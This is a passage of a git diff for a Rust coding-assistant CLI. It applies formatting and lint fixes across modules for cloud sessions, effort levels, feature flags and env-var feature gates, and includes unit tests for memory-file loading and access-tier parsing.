"---\nmemory_type: project\npriority: 10\n---\nHello world"; + let (fm, body) = parse_frontmatter(content); + assert_eq!(fm.memory_type.as_deref(), Some("project")); + assert_eq!(fm.priority, Some(10)); + assert_eq!(body.trim(), "Hello world"); + } + + #[test] + fn parse_frontmatter_none() { + let content = "No frontmatter here"; + let (fm, body) = parse_frontmatter(content); + assert!(fm.memory_type.is_none()); + assert_eq!(body, content); + } + + #[test] + fn load_scope_prefers_agents_then_claude() { + let tmp = tempfile::tempdir().unwrap(); + std::fs::write(tmp.path().join("AGENTS.md"), "agents content").unwrap(); + std::fs::write(tmp.path().join("CLAUDE.md"), "claude content").unwrap(); + + let files = load_all_memory_files(tmp.path()); + // Filter to just the project-scope files from our temp dir. + let project: Vec<_> = files + .iter() + .filter(|f| f.path.starts_with(tmp.path())) + .collect(); + assert_eq!( + project.len(), + 2, + "both AGENTS.md and CLAUDE.md should be loaded" + ); + assert!( + project[0].path.ends_with("AGENTS.md"), + "AGENTS.md must come first" + ); + assert!( + project[1].path.ends_with("CLAUDE.md"), + "CLAUDE.md must follow" + ); + } + + #[test] + fn load_scope_claudemd_only_fallback() { + let tmp = tempfile::tempdir().unwrap(); + std::fs::write(tmp.path().join("CLAUDE.md"), "claude only").unwrap(); + + let files = load_all_memory_files(tmp.path()); + let project: Vec<_> = files + .iter() + .filter(|f| f.path.starts_with(tmp.path())) + .collect(); + assert_eq!(project.len(), 1); + assert!(project[0].path.ends_with("CLAUDE.md")); + } + + #[test] + fn expand_includes_circular() { + let tmp = tempfile::tempdir().unwrap(); + let a = tmp.path().join("a.md"); + let b = tmp.path().join("b.md"); + std::fs::write(&a, "@include b.md\n").unwrap(); + std::fs::write(&b, "@include a.md\ncontent\n").unwrap(); + let result = expand_includes( + "@include a.md\n", + tmp.path(), + &mut std::collections::HashSet::new(), + 0, + ); + // Should not infinite-loop; circular reference comment present. + assert!(result.contains("circular") || result.contains("content")); + } +} diff --git a/src-rust/crates/core/src/cloud_session.rs b/src-rust/crates/core/src/cloud_session.rs index 3ff2d47..dd67f6f 100644 --- a/src-rust/crates/core/src/cloud_session.rs +++ b/src-rust/crates/core/src/cloud_session.rs @@ -3,9 +3,9 @@ //! Converts between internal Message types and the cloud API format. //! Provides CRUD operations for cloud-hosted sessions. +use crate::types::{ContentBlock, Message, MessageContent, Role}; use serde::{Deserialize, Serialize}; use serde_json::Value; -use crate::types::{Message, Role, MessageContent, ContentBlock}; // --------------------------------------------------------------------------- // Cloud session API types @@ -37,7 +37,7 @@ pub struct CloudSessionDetail { #[derive(Debug, Clone, Serialize, Deserialize)] pub struct CloudMessage { pub id: String, - pub role: String, // "user" | "assistant" + pub role: String, // "user" | "assistant" pub content: Vec, // Array of Anthropic-schema content block objects pub created_at: u64, pub session_id: String, @@ -70,10 +70,7 @@ pub fn message_to_cloud(msg: &Message, session_id: &str, msg_id: &str, ts: u64) let content: Vec = content_to_blocks(&msg.content) .into_iter() - .map(|block| { - serde_json::to_value(&block) - .unwrap_or_else(|_| Value::Null) - }) + .map(|block| serde_json::to_value(&block).unwrap_or(Value::Null)) .collect(); CloudMessage { @@ -91,7 +88,11 @@ pub fn message_to_cloud(msg: &Message, session_id: &str, msg_id: &str, ts: u64) /// that cannot be parsed are silently skipped so that unknown future block /// types do not crash older clients. pub fn cloud_to_message(cloud: &CloudMessage) -> Message { - let role = if cloud.role == "assistant" { Role::Assistant } else { Role::User }; + let role = if cloud.role == "assistant" { + Role::Assistant + } else { + Role::User + }; let blocks: Vec = cloud .content @@ -141,20 +142,24 @@ impl CloudSessionClient { /// List all cloud sessions. pub async fn list(&self) -> Result, String> { - let resp = self.http + let resp = self + .http .get(format!("{}/api/sessions", self.base_url)) .header("Authorization", format!("Bearer {}", self.access_token)) - .send().await + .send() + .await .map_err(|e| e.to_string())?; resp.json().await.map_err(|e| e.to_string()) } /// Fetch full session details including messages. pub async fn fetch(&self, session_id: &str) -> Result { - let resp = self.http + let resp = self + .http .get(format!("{}/api/sessions/{}", self.base_url, session_id)) .header("Authorization", format!("Bearer {}", self.access_token)) - .send().await + .send() + .await .map_err(|e| e.to_string())?; resp.json().await.map_err(|e| e.to_string()) } @@ -165,11 +170,16 @@ impl CloudSessionClient { session_id: &str, messages: &[CloudMessage], ) -> Result<(), String> { - let resp = self.http - .post(format!("{}/api/sessions/{}/messages", self.base_url, session_id)) + let resp = self + .http + .post(format!( + "{}/api/sessions/{}/messages", + self.base_url, session_id + )) .header("Authorization", format!("Bearer {}", self.access_token)) .json(messages) - .send().await + .send() + .await .map_err(|e| e.to_string())?; if !resp.status().is_success() { return Err(format!("HTTP {}", resp.status())); @@ -178,22 +188,29 @@ impl CloudSessionClient { } /// Create a new cloud session. - pub async fn create(&self, opts: CloudSessionCreateOpts) -> Result { - let resp = self.http + pub async fn create( + &self, + opts: CloudSessionCreateOpts, + ) -> Result { + let resp = self + .http .post(format!("{}/api/sessions", self.base_url)) .header("Authorization", format!("Bearer {}", self.access_token)) .json(&opts) - .send().await + .send() + .await .map_err(|e| e.to_string())?; resp.json().await.map_err(|e| e.to_string()) } /// Delete a cloud session. pub async fn delete(&self, session_id: &str) -> Result<(), String> { - let resp = self.http + let resp = self + .http .delete(format!("{}/api/sessions/{}", self.base_url, session_id)) .header("Authorization", format!("Bearer {}", self.access_token)) - .send().await + .send() + .await .map_err(|e| e.to_string())?; if !resp.status().is_success() { return Err(format!("HTTP {}", resp.status())); diff --git a/src-rust/crates/core/src/coven_shared.rs b/src-rust/crates/core/src/coven_shared.rs index c07a9ff..ba7d381 100644 --- a/src-rust/crates/core/src/coven_shared.rs +++ b/src-rust/crates/core/src/coven_shared.rs @@ -470,7 +470,10 @@ access = "search-only" fn canonicalize_access_tier_normalizes_case_and_whitespace() { assert_eq!(canonicalize_access_tier("FULL"), Some("full")); assert_eq!(canonicalize_access_tier("Read-Only"), Some("read-only")); - assert_eq!(canonicalize_access_tier(" search-only\n"), Some("search-only")); + assert_eq!( + canonicalize_access_tier(" search-only\n"), + Some("search-only") + ); assert_eq!(canonicalize_access_tier(" full "), Some("full")); } @@ -478,7 +481,14 @@ access = "search-only" fn canonicalize_access_tier_rejects_unknown_strings() { // Typos and near-matches must NOT round-trip — callers depend on // `None` to trigger fail-closed behavior. - for unknown in &["readonly", "Full Access", "writable", "", "rad-only", "search only"] { + for unknown in &[ + "readonly", + "Full Access", + "writable", + "", + "rad-only", + "search only", + ] { assert!( canonicalize_access_tier(unknown).is_none(), "expected {unknown:?} to be rejected" diff --git a/src-rust/crates/core/src/crypto_utils.rs b/src-rust/crates/core/src/crypto_utils.rs index ee4cc83..aa50e55 100644 --- a/src-rust/crates/core/src/crypto_utils.rs +++ b/src-rust/crates/core/src/crypto_utils.rs @@ -3,7 +3,7 @@ //! Provides SHA-256 hashing, UUID generation, base64url encoding, //! and work secret generation. -use base64::{Engine, engine::general_purpose::URL_SAFE_NO_PAD}; +use base64::{engine::general_purpose::URL_SAFE_NO_PAD, Engine}; use sha2::{Digest, Sha256}; use std::time::{SystemTime, UNIX_EPOCH}; diff --git a/src-rust/crates/core/src/effort.rs b/src-rust/crates/core/src/effort.rs index 226ddae..9bfa072 100644 --- a/src-rust/crates/core/src/effort.rs +++ b/src-rust/crates/core/src/effort.rs @@ -1,195 +1,200 @@ -// effort.rs — EffortLevel enum and associated helpers. -// -// Maps to src/utils/effort.ts in the TypeScript source. The Rust port -// retains only the subset of logic that is useful in a non-browser / non-GrowthBook -// environment: the level → thinking-budget / temperature / glyph mappings. -// -// The thinking-budget and temperature values must match the TypeScript source -// exactly because they are passed to the Anthropic API. - -// --------------------------------------------------------------------------- -// EffortLevel enum -// --------------------------------------------------------------------------- - -/// The four named effort levels supported by Coven Code. -/// -/// Matches the `EffortLevel` type from `src/entrypoints/sdk/runtimeTypes.ts` -/// / `src/utils/effort.ts`. -#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash)] -pub enum EffortLevel { - /// Quick, straightforward implementation with minimal overhead. - Low, - /// Balanced approach with standard implementation and testing. - Medium, - /// Comprehensive implementation with extensive testing and documentation. - High, - /// Maximum capability with deepest reasoning (Opus 4.6 only). - Max, -} - -impl EffortLevel { - /// Parse an effort level from its string representation. - /// - /// Accepts lowercase strings: `"low"`, `"medium"`, `"high"`, `"max"`. - /// Returns `None` for any other value. - pub fn from_str(s: &str) -> Option { - match s.to_ascii_lowercase().as_str() { - "low" => Some(Self::Low), - "medium" => Some(Self::Medium), - "high" => Some(Self::High), - "max" => Some(Self::Max), - _ => None, - } - } - - /// The lowercase string name of this effort level. - /// - /// Round-trips with `from_str`. - pub fn as_str(&self) -> &'static str { - match self { - Self::Low => "low", - Self::Medium => "medium", - Self::High => "high", - Self::Max => "max", - } - } - - /// Return the extended-thinking budget in tokens for this effort level, - /// or `None` if thinking should be disabled. - /// - /// Values mirror the TypeScript `thinkingBudgetForEffort` mapping: - /// Low → None (no thinking) - /// Medium → 5 000 - /// High → 10 000 - /// Max → 20 000 - pub fn thinking_budget_tokens(&self) -> Option { - match self { - Self::Low => None, - Self::Medium => Some(5_000), - Self::High => Some(10_000), - Self::Max => Some(20_000), - } - } - - /// Return the temperature override for this effort level, or `None` to - /// use the model's default. - /// - /// Values mirror the TypeScript source: - /// Low → Some(0.0) — deterministic, cheap - /// Medium → None — model default - /// High → None — model default - /// Max → None — model default - pub fn temperature(&self) -> Option { - match self { - Self::Low => Some(0.0), - Self::Medium | Self::High | Self::Max => None, - } - } - - /// A single Unicode glyph used to represent this effort level in the TUI. - /// - /// Glyphs mirror the TypeScript EffortCallout / status-bar rendering: - /// Low → "○" (empty circle) - /// Medium → "◐" (half circle) - /// High → "●" (filled circle) - /// Max → "◉" (circled circle) - pub fn glyph(&self) -> &'static str { - match self { - Self::Low => "○", - Self::Medium => "◐", - Self::High => "●", - Self::Max => "◉", - } - } - - /// Human-readable description of this effort level. - pub fn description(&self) -> &'static str { - match self { - Self::Low => "Quick, straightforward implementation with minimal overhead", - Self::Medium => "Balanced approach with standard implementation and testing", - Self::High => "Comprehensive implementation with extensive testing and documentation", - Self::Max => "Maximum capability with deepest reasoning (Opus 4.6 only)", - } - } -} - -impl std::fmt::Display for EffortLevel { - fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { - f.write_str(self.as_str()) - } -} - -// --------------------------------------------------------------------------- -// Tests -// --------------------------------------------------------------------------- - -#[cfg(test)] -mod tests { - use super::*; - - #[test] - fn from_str_roundtrips() { - for level in [ - EffortLevel::Low, - EffortLevel::Medium, - EffortLevel::High, - EffortLevel::Max, - ] { - let parsed = EffortLevel::from_str(level.as_str()); - assert_eq!(parsed, Some(level), "from_str({:?}) should round-trip", level); - } - } - - #[test] - fn from_str_case_insensitive() { - assert_eq!(EffortLevel::from_str("LOW"), Some(EffortLevel::Low)); - assert_eq!(EffortLevel::from_str("Medium"), Some(EffortLevel::Medium)); - assert_eq!(EffortLevel::from_str("HIGH"), Some(EffortLevel::High)); - assert_eq!(EffortLevel::from_str("Max"), Some(EffortLevel::Max)); - } - - #[test] - fn from_str_unknown_returns_none() { - assert_eq!(EffortLevel::from_str("ultra"), None); - assert_eq!(EffortLevel::from_str(""), None); - assert_eq!(EffortLevel::from_str("3"), None); - } - - #[test] - fn thinking_budget_matches_ts() { - assert_eq!(EffortLevel::Low.thinking_budget_tokens(), None); - assert_eq!(EffortLevel::Medium.thinking_budget_tokens(), Some(5_000)); - assert_eq!(EffortLevel::High.thinking_budget_tokens(), Some(10_000)); - assert_eq!(EffortLevel::Max.thinking_budget_tokens(), Some(20_000)); - } - - #[test] - fn temperature_matches_ts() { - // Low → 0.0 (deterministic) - assert_eq!(EffortLevel::Low.temperature(), Some(0.0)); - // All others → None (model default) - assert_eq!(EffortLevel::Medium.temperature(), None); - assert_eq!(EffortLevel::High.temperature(), None); - assert_eq!(EffortLevel::Max.temperature(), None); - } - - #[test] - fn glyphs_match_ts() { - assert_eq!(EffortLevel::Low.glyph(), "○"); - assert_eq!(EffortLevel::Medium.glyph(), "◐"); - assert_eq!(EffortLevel::High.glyph(), "●"); - assert_eq!(EffortLevel::Max.glyph(), "◉"); - } - - #[test] - fn display_matches_as_str() { - for level in [ - EffortLevel::Low, - EffortLevel::Medium, - EffortLevel::High, - EffortLevel::Max, - ] { - assert_eq!(format!("{}", level), level.as_str()); - } - } -} +// effort.rs — EffortLevel enum and associated helpers. +// +// Maps to src/utils/effort.ts in the TypeScript source. The Rust port +// retains only the subset of logic that is useful in a non-browser / non-GrowthBook +// environment: the level → thinking-budget / temperature / glyph mappings. +// +// The thinking-budget and temperature values must match the TypeScript source +// exactly because they are passed to the Anthropic API. + +// --------------------------------------------------------------------------- +// EffortLevel enum +// --------------------------------------------------------------------------- + +/// The four named effort levels supported by Coven Code. +/// +/// Matches the `EffortLevel` type from `src/entrypoints/sdk/runtimeTypes.ts` +/// / `src/utils/effort.ts`. +#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash)] +pub enum EffortLevel { + /// Quick, straightforward implementation with minimal overhead. + Low, + /// Balanced approach with standard implementation and testing. + Medium, + /// Comprehensive implementation with extensive testing and documentation. + High, + /// Maximum capability with deepest reasoning (Opus 4.6 only). + Max, +} + +impl EffortLevel { + /// Parse an effort level from its string representation. + /// + /// Accepts lowercase strings: `"low"`, `"medium"`, `"high"`, `"max"`. + /// Returns `None` for any other value. + pub fn parse(s: &str) -> Option { + match s.to_ascii_lowercase().as_str() { + "low" => Some(Self::Low), + "medium" => Some(Self::Medium), + "high" => Some(Self::High), + "max" => Some(Self::Max), + _ => None, + } + } + + /// The lowercase string name of this effort level. + /// + /// Round-trips with `from_str`. + pub fn as_str(&self) -> &'static str { + match self { + Self::Low => "low", + Self::Medium => "medium", + Self::High => "high", + Self::Max => "max", + } + } + + /// Return the extended-thinking budget in tokens for this effort level, + /// or `None` if thinking should be disabled. + /// + /// Values mirror the TypeScript `thinkingBudgetForEffort` mapping: + /// Low → None (no thinking) + /// Medium → 5 000 + /// High → 10 000 + /// Max → 20 000 + pub fn thinking_budget_tokens(&self) -> Option { + match self { + Self::Low => None, + Self::Medium => Some(5_000), + Self::High => Some(10_000), + Self::Max => Some(20_000), + } + } + + /// Return the temperature override for this effort level, or `None` to + /// use the model's default. + /// + /// Values mirror the TypeScript source: + /// Low → Some(0.0) — deterministic, cheap + /// Medium → None — model default + /// High → None — model default + /// Max → None — model default + pub fn temperature(&self) -> Option { + match self { + Self::Low => Some(0.0), + Self::Medium | Self::High | Self::Max => None, + } + } + + /// A single Unicode glyph used to represent this effort level in the TUI. + /// + /// Glyphs mirror the TypeScript EffortCallout / status-bar rendering: + /// Low → "○" (empty circle) + /// Medium → "◐" (half circle) + /// High → "●" (filled circle) + /// Max → "◉" (circled circle) + pub fn glyph(&self) -> &'static str { + match self { + Self::Low => "○", + Self::Medium => "◐", + Self::High => "●", + Self::Max => "◉", + } + } + + /// Human-readable description of this effort level. + pub fn description(&self) -> &'static str { + match self { + Self::Low => "Quick, straightforward implementation with minimal overhead", + Self::Medium => "Balanced approach with standard implementation and testing", + Self::High => "Comprehensive implementation with extensive testing and documentation", + Self::Max => "Maximum capability with deepest reasoning (Opus 4.6 only)", + } + } +} + +impl std::fmt::Display for EffortLevel { + fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { + f.write_str(self.as_str()) + } +} + +// --------------------------------------------------------------------------- +// Tests +// --------------------------------------------------------------------------- + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn from_str_roundtrips() { + for level in [ + EffortLevel::Low, + EffortLevel::Medium, + EffortLevel::High, + EffortLevel::Max, + ] { + let parsed = EffortLevel::parse(level.as_str()); + assert_eq!( + parsed, + Some(level), + "from_str({:?}) should round-trip", + level + ); + } + } + + #[test] + fn from_str_case_insensitive() { + assert_eq!(EffortLevel::parse("LOW"), Some(EffortLevel::Low)); + assert_eq!(EffortLevel::parse("Medium"), Some(EffortLevel::Medium)); + assert_eq!(EffortLevel::parse("HIGH"), Some(EffortLevel::High)); + assert_eq!(EffortLevel::parse("Max"), Some(EffortLevel::Max)); + } + + #[test] + fn from_str_unknown_returns_none() { + assert_eq!(EffortLevel::parse("ultra"), None); + assert_eq!(EffortLevel::parse(""), None); + assert_eq!(EffortLevel::parse("3"), None); + } + + #[test] + fn thinking_budget_matches_ts() { + assert_eq!(EffortLevel::Low.thinking_budget_tokens(), None); + assert_eq!(EffortLevel::Medium.thinking_budget_tokens(), Some(5_000)); + assert_eq!(EffortLevel::High.thinking_budget_tokens(), Some(10_000)); + assert_eq!(EffortLevel::Max.thinking_budget_tokens(), Some(20_000)); + } + + #[test] + fn temperature_matches_ts() { + // Low → 0.0 (deterministic) + assert_eq!(EffortLevel::Low.temperature(), Some(0.0)); + // All others → None (model default) + assert_eq!(EffortLevel::Medium.temperature(), None); + assert_eq!(EffortLevel::High.temperature(), None); + assert_eq!(EffortLevel::Max.temperature(), None); + } + + #[test] + fn glyphs_match_ts() { + assert_eq!(EffortLevel::Low.glyph(), "○"); + assert_eq!(EffortLevel::Medium.glyph(), "◐"); + assert_eq!(EffortLevel::High.glyph(), "●"); + assert_eq!(EffortLevel::Max.glyph(), "◉"); + } + + #[test] + fn display_matches_as_str() { + for level in [ + EffortLevel::Low, + EffortLevel::Medium, + EffortLevel::High, + EffortLevel::Max, + ] { + assert_eq!(format!("{}", level), level.as_str()); + } + } +} diff --git a/src-rust/crates/core/src/feature_flags.rs b/src-rust/crates/core/src/feature_flags.rs index bcc5960..108bcd9 100644 --- a/src-rust/crates/core/src/feature_flags.rs +++ b/src-rust/crates/core/src/feature_flags.rs @@ -50,7 +50,7 @@ pub struct FeatureFlagManager { http_client: reqwest::Client, } -impl FeatureFlagManager { +impl FeatureFlagManager { /// Create a new feature flag manager /// /// The API key is automatically fetched from the GROWTHBOOK_API_KEY environment variable. @@ -66,7 +66,7 @@ impl FeatureFlagManager { cache_ttl, http_client: reqwest::Client::new(), } - } + } /// Get the cache file path (~/.coven-code/feature_flags.json) fn get_cache_path() -> PathBuf { @@ -213,7 +213,13 @@ impl FeatureFlagManager { } debug!("Loaded {} feature flags", flags.len()); } -} +} + +impl Default for FeatureFlagManager { + fn default() -> Self { + Self::new() + } +} /// Response from GrowthBook API #[derive(Debug, Deserialize)] diff --git a/src-rust/crates/core/src/feature_gates.rs b/src-rust/crates/core/src/feature_gates.rs index ec46b43..50c8df3 100644 --- a/src-rust/crates/core/src/feature_gates.rs +++ b/src-rust/crates/core/src/feature_gates.rs @@ -1,257 +1,260 @@ -// feature_gates.rs — Env-var-based feature gates and dynamic config. -// -// Replaces the GrowthBook SDK used in the TypeScript source -// (`src/services/analytics/growthbook.ts`). Feature flags are toggled via -// environment variables instead of a remote service, which is simpler and -// dependency-free for the Rust port. - -use std::collections::HashMap; - -use serde::de::DeserializeOwned; - -// --------------------------------------------------------------------------- -// Name normalization -// --------------------------------------------------------------------------- - -/// Normalize a gate/config name to the env-var suffix form: -/// uppercase, replace `-` and `.` with `_`, strip other non-alphanumeric -/// characters (except `_`). -/// -/// Examples: -/// "my-feature" → "MY_FEATURE" -/// "tengu.tide.elm" → "TENGU_TIDE_ELM" -/// "some:special!name" → "SOMESPECIALNAME" -fn normalize_name(name: &str) -> String { - name.chars() - .map(|c| match c { - '-' | '.' => '_', - c if c.is_alphanumeric() || c == '_' => c.to_ascii_uppercase(), - _ => '\0', // sentinel — filtered out below - }) - .filter(|&c| c != '\0') - .collect() -} - -// --------------------------------------------------------------------------- -// Feature gates -// --------------------------------------------------------------------------- - -/// Check whether a named feature gate is enabled. -/// -/// Reads `COVEN_CODE_FEATURE_` and returns `true` when the -/// value is truthy ("1", "true", "yes", "on" — case-insensitive). -/// -/// Mirrors `checkStatsigFeatureGate_CACHED_MAY_BE_STALE` from the TypeScript -/// GrowthBook integration. -pub fn is_feature_enabled(gate_name: &str) -> bool { - let key = format!("COVEN_CODE_FEATURE_{}", normalize_name(gate_name)); - is_env_truthy(std::env::var(&key).ok().as_deref()) -} - -// --------------------------------------------------------------------------- -// Dynamic config -// --------------------------------------------------------------------------- - -/// Read a JSON-encoded dynamic config from an environment variable. -/// -/// Reads `COVEN_CODE_DYNAMIC_CONFIG_`. If the variable is -/// not set, or parsing fails, `default` is returned unchanged. -/// -/// Mirrors `getDynamicConfig_CACHED_MAY_BE_STALE` from the TypeScript source. -pub fn get_dynamic_config(name: &str, default: T) -> T { - let key = format!("COVEN_CODE_DYNAMIC_CONFIG_{}", normalize_name(name)); - match std::env::var(&key) { - Ok(val) => serde_json::from_str(&val).unwrap_or(default), - Err(_) => default, - } -} - -// --------------------------------------------------------------------------- -// Bare / simple mode -// --------------------------------------------------------------------------- - -/// Return `true` when Coven Code should run in "bare" (minimal) mode. -/// -/// Bare mode skips LSP, plugin, and MCP startup for a faster, lighter -/// experience. It is enabled by either: -/// - The `COVEN_CODE_SIMPLE=1` environment variable, OR -/// - The `--bare` flag in `std::env::args()`. -pub fn is_bare_mode() -> bool { - // Check env var - if is_env_truthy(std::env::var("COVEN_CODE_SIMPLE").ok().as_deref()) { - return true; - } - // Check CLI args without going through clap (avoids a full parse at this stage) - std::env::args().any(|a| a == "--bare") -} - -// --------------------------------------------------------------------------- -// Env-var truthiness helpers -// --------------------------------------------------------------------------- - -/// Return `true` when `val` is a truthy env-var value. -/// -/// Truthy: `"1"`, `"true"`, `"yes"`, `"on"` (case-insensitive). -/// `None` (variable unset) is falsy. -pub fn is_env_truthy(val: Option<&str>) -> bool { - match val { - Some(v) => matches!(v.to_ascii_lowercase().as_str(), "1" | "true" | "yes" | "on"), - None => false, - } -} - -/// Return `true` when `val` is an explicitly-falsy env-var value. -/// -/// Falsy: `"0"`, `"false"`, `"no"`, `"off"` (case-insensitive). -/// `None` (variable unset) returns `false` — unset is *not* defined-falsy. -pub fn is_env_defined_falsy(val: Option<&str>) -> bool { - match val { - Some(v) => { - matches!(v.to_ascii_lowercase().as_str(), "0" | "false" | "no" | "off") - } - None => false, - } -} - -// --------------------------------------------------------------------------- -// Env-var parsing for --env KEY=VALUE arguments -// --------------------------------------------------------------------------- - -/// Parse a slice of `"KEY=VALUE"` strings into a `HashMap`. -/// -/// Returns an error if any entry lacks a `=` separator. -pub fn parse_env_vars(args: &[String]) -> anyhow::Result> { - let mut map = HashMap::new(); - for entry in args { - if let Some(pos) = entry.find('=') { - let key = entry[..pos].to_string(); - let value = entry[pos + 1..].to_string(); - map.insert(key, value); - } else { - return Err(anyhow::anyhow!( - "Invalid env-var format '{}': expected KEY=VALUE", - entry - )); - } - } - Ok(map) -} - -// --------------------------------------------------------------------------- -// AWS region -// --------------------------------------------------------------------------- - -/// Resolve the AWS region, checking `AWS_REGION` then `AWS_DEFAULT_REGION`, -/// falling back to `"us-east-1"`. -pub fn get_aws_region() -> String { - std::env::var("AWS_REGION") - .or_else(|_| std::env::var("AWS_DEFAULT_REGION")) - .unwrap_or_else(|_| "us-east-1".to_string()) -} - -// --------------------------------------------------------------------------- -// Tests -// --------------------------------------------------------------------------- - -#[cfg(test)] -mod tests { - use super::*; - - // --- normalize_name --- - - #[test] - fn normalize_replaces_dashes_and_dots() { - assert_eq!(normalize_name("my-feature"), "MY_FEATURE"); - assert_eq!(normalize_name("tengu.tide.elm"), "TENGU_TIDE_ELM"); - assert_eq!(normalize_name("a-b.c"), "A_B_C"); - } - - #[test] - fn normalize_strips_special_chars() { - assert_eq!(normalize_name("some:special!name"), "SOMESPECIALNAME"); - } - - #[test] - fn normalize_preserves_underscores() { - assert_eq!(normalize_name("already_upper"), "ALREADY_UPPER"); - } - - // --- is_env_truthy --- - - #[test] - fn truthy_values() { - for v in &["1", "true", "True", "TRUE", "yes", "YES", "on", "ON"] { - assert!(is_env_truthy(Some(v)), "expected truthy for {:?}", v); - } - } - - #[test] - fn falsy_values_are_not_truthy() { - for v in &["0", "false", "no", "off", "", "anything"] { - assert!(!is_env_truthy(Some(v)), "expected non-truthy for {:?}", v); - } - assert!(!is_env_truthy(None)); - } - - // --- is_env_defined_falsy --- - - #[test] - fn defined_falsy_values() { - for v in &["0", "false", "False", "FALSE", "no", "NO", "off", "OFF"] { - assert!( - is_env_defined_falsy(Some(v)), - "expected defined-falsy for {:?}", - v - ); - } - } - - #[test] - fn non_falsy_values() { - for v in &["1", "true", "yes", "on", ""] { - assert!( - !is_env_defined_falsy(Some(v)), - "expected non-defined-falsy for {:?}", - v - ); - } - assert!(!is_env_defined_falsy(None)); - } - - // --- parse_env_vars --- - - #[test] - fn parse_env_vars_basic() { - let args = vec!["KEY=VALUE".to_string(), "FOO=bar=baz".to_string()]; - let map = parse_env_vars(&args).unwrap(); - assert_eq!(map["KEY"], "VALUE"); - // value may contain `=` - assert_eq!(map["FOO"], "bar=baz"); - } - - #[test] - fn parse_env_vars_error_on_no_equals() { - let args = vec!["NOEQUALSSIGN".to_string()]; - assert!(parse_env_vars(&args).is_err()); - } - - // --- get_aws_region --- - - #[test] - fn aws_region_fallback() { - // Ensure the fallback works when neither env var is set. - // We can't easily unset env vars in tests, so we just verify the - // function returns a non-empty string. - let region = get_aws_region(); - assert!(!region.is_empty()); - } - - // --- get_dynamic_config --- - - #[test] - fn dynamic_config_returns_default_when_unset() { - // Use an unlikely key so we don't collide with a real env var. - let val: u32 = get_dynamic_config("__test_unset_key_xyzzy__", 42u32); - assert_eq!(val, 42); - } -} +// feature_gates.rs — Env-var-based feature gates and dynamic config. +// +// Replaces the GrowthBook SDK used in the TypeScript source +// (`src/services/analytics/growthbook.ts`). Feature flags are toggled via +// environment variables instead of a remote service, which is simpler and +// dependency-free for the Rust port. + +use std::collections::HashMap; + +use serde::de::DeserializeOwned; + +// --------------------------------------------------------------------------- +// Name normalization +// --------------------------------------------------------------------------- + +/// Normalize a gate/config name to the env-var suffix form: +/// uppercase, replace `-` and `.` with `_`, strip other non-alphanumeric +/// characters (except `_`). +/// +/// Examples: +/// "my-feature" → "MY_FEATURE" +/// "tengu.tide.elm" → "TENGU_TIDE_ELM" +/// "some:special!name" → "SOMESPECIALNAME" +fn normalize_name(name: &str) -> String { + name.chars() + .map(|c| match c { + '-' | '.' => '_', + c if c.is_alphanumeric() || c == '_' => c.to_ascii_uppercase(), + _ => '\0', // sentinel — filtered out below + }) + .filter(|&c| c != '\0') + .collect() +} + +// --------------------------------------------------------------------------- +// Feature gates +// --------------------------------------------------------------------------- + +/// Check whether a named feature gate is enabled. +/// +/// Reads `COVEN_CODE_FEATURE_` and returns `true` when the +/// value is truthy ("1", "true", "yes", "on" — case-insensitive). +/// +/// Mirrors `checkStatsigFeatureGate_CACHED_MAY_BE_STALE` from the TypeScript +/// GrowthBook integration. +pub fn is_feature_enabled(gate_name: &str) -> bool { + let key = format!("COVEN_CODE_FEATURE_{}", normalize_name(gate_name)); + is_env_truthy(std::env::var(&key).ok().as_deref()) +} + +// --------------------------------------------------------------------------- +// Dynamic config +// --------------------------------------------------------------------------- + +/// Read a JSON-encoded dynamic config from an environment variable. +/// +/// Reads `COVEN_CODE_DYNAMIC_CONFIG_`. If the variable is +/// not set, or parsing fails, `default` is returned unchanged. +/// +/// Mirrors `getDynamicConfig_CACHED_MAY_BE_STALE` from the TypeScript source. +pub fn get_dynamic_config(name: &str, default: T) -> T { + let key = format!("COVEN_CODE_DYNAMIC_CONFIG_{}", normalize_name(name)); + match std::env::var(&key) { + Ok(val) => serde_json::from_str(&val).unwrap_or(default), + Err(_) => default, + } +} + +// --------------------------------------------------------------------------- +// Bare / simple mode +// --------------------------------------------------------------------------- + +/// Return `true` when Coven Code should run in "bare" (minimal) mode. +/// +/// Bare mode skips LSP, plugin, and MCP startup for a faster, lighter +/// experience. It is enabled by either: +/// - The `COVEN_CODE_SIMPLE=1` environment variable, OR +/// - The `--bare` flag in `std::env::args()`. +pub fn is_bare_mode() -> bool { + // Check env var + if is_env_truthy(std::env::var("COVEN_CODE_SIMPLE").ok().as_deref()) { + return true; + } + // Check CLI args without going through clap (avoids a full parse at this stage) + std::env::args().any(|a| a == "--bare") +} + +// --------------------------------------------------------------------------- +// Env-var truthiness helpers +// --------------------------------------------------------------------------- + +/// Return `true` when `val` is a truthy env-var value. +/// +/// Truthy: `"1"`, `"true"`, `"yes"`, `"on"` (case-insensitive). +/// `None` (variable unset) is falsy. +pub fn is_env_truthy(val: Option<&str>) -> bool { + match val { + Some(v) => matches!(v.to_ascii_lowercase().as_str(), "1" | "true" | "yes" | "on"), + None => false, + } +} + +/// Return `true` when `val` is an explicitly-falsy env-var value. +/// +/// Falsy: `"0"`, `"false"`, `"no"`, `"off"` (case-insensitive). +/// `None` (variable unset) returns `false` — unset is *not* defined-falsy. +pub fn is_env_defined_falsy(val: Option<&str>) -> bool { + match val { + Some(v) => { + matches!( + v.to_ascii_lowercase().as_str(), + "0" | "false" | "no" | "off" + ) + } + None => false, + } +} + +// --------------------------------------------------------------------------- +// Env-var parsing for --env KEY=VALUE arguments +// --------------------------------------------------------------------------- + +/// Parse a slice of `"KEY=VALUE"` strings into a `HashMap`. +/// +/// Returns an error if any entry lacks a `=` separator. +pub fn parse_env_vars(args: &[String]) -> anyhow::Result> { + let mut map = HashMap::new(); + for entry in args { + if let Some(pos) = entry.find('=') { + let key = entry[..pos].to_string(); + let value = entry[pos + 1..].to_string(); + map.insert(key, value); + } else { + return Err(anyhow::anyhow!( + "Invalid env-var format '{}': expected KEY=VALUE", + entry + )); + } + } + Ok(map) +} + +// --------------------------------------------------------------------------- +// AWS region +// --------------------------------------------------------------------------- + +/// Resolve the AWS region, checking `AWS_REGION` then `AWS_DEFAULT_REGION`, +/// falling back to `"us-east-1"`. +pub fn get_aws_region() -> String { + std::env::var("AWS_REGION") + .or_else(|_| 